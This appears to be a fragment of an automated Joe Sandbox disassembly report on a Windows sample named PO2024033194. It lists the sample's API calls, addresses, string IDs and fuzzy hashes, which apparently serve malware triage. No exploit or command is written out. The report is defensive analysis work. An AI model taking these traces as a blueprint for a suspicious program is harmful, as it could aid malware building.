                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                  • String ID:
                                                                  • API String ID: 3495660284-0
                                                                  • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                  • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                  • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                  • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                  APIs
                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                  Similarity
                                                                  • API ID: Virtual
                                                                  • String ID:
                                                                  • API String ID: 4278518827-0
                                                                  • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                  • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                  • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                  • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                  APIs
                                                                  • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                    • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                    • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                  • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                    • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                  • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                  • ExitThread.KERNEL32 ref: 004151ED
                                                                  • __freefls@4.LIBCMT ref: 00415209
                                                                  Similarity
                                                                  • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                  • String ID:
                                                                  • API String ID: 442100245-0
                                                                  • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                  • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                  • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                  • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                  APIs
                                                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                  • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                  • _wcslen.LIBCMT ref: 0045F94A
                                                                  • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                  • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                  • String ID: 0
                                                                  • API String ID: 621800784-4108050209
                                                                  • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                  • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                  • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                  • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                  APIs
                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                  • SetErrorMode.KERNEL32 ref: 004781CE
                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                    • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                  • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                  • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                  • String ID: \VH
                                                                  • API String ID: 3884216118-234962358
                                                                  • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                  • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                  • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                  • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                  • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                  • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
                                                                  • String ID: AU3_GetPluginDetails$#v
                                                                  • API String ID: 145871493-3662034293
                                                                  • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                                  • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                                  • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                                  • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                                  APIs
                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                  • IsMenu.USER32(?), ref: 0044854D
                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                  • DrawMenuBar.USER32 ref: 004485AF
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Menu$Item$DrawInfoInsert
                                                                  • String ID: 0
                                                                  • API String ID: 3076010158-4108050209
                                                                  • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                  • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                  • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                  • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                  APIs
                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                  • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$_memmove_wcslen
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 1589278365-1403004172
                                                                  • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                  • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                  • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                  • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Handle
                                                                  • String ID: nul
                                                                  • API String ID: 2519475695-2873401336
                                                                  • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                  • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                  • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                  • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Handle
                                                                  • String ID: nul
                                                                  • API String ID: 2519475695-2873401336
                                                                  • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                  • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                  • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                  • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                  APIs
                                                                  • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                  • _wcsncpy.LIBCMT ref: 00401C41
                                                                  • _wcscpy.LIBCMT ref: 00401C5D
                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                  • String ID: Line:
                                                                  • API String ID: 1874344091-1585850449
                                                                  • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                  • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                  • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                  • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: SysAnimate32
                                                                  • API String ID: 0-1011021900
                                                                  • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                  • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                  • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                  • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                  APIs
                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                    • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                    • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                    • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                    • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                  • GetFocus.USER32 ref: 0046157B
                                                                    • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                    • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                  • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                  • __swprintf.LIBCMT ref: 00461608
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                  • String ID: %s%d
                                                                  • API String ID: 2645982514-1110647743
                                                                  • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                  • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                  • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                  • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                  • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                  • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                  • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                  APIs
                                                                  • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CloseCountersCurrentHandleOpen
                                                                  • String ID:
                                                                  • API String ID: 3488606520-0
                                                                  • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                  • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                  • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                  • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                  APIs
                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ConnectRegistry_memmove_wcslen
                                                                  • String ID:
                                                                  • API String ID: 15295421-0
                                                                  • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                  • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                  • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                  • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 004563A6
                                                                  • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                  • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                  • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                  • String ID:
                                                                  • API String ID: 3539004672-0
                                                                  • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                  • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                  • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                  • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                  APIs
                                                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                  • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Interlocked$DecrementIncrement$Sleep
                                                                  • String ID:
                                                                  • API String ID: 327565842-0
                                                                  • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                  • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                  • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                  • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                  APIs
                                                                  • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                  • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                  • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
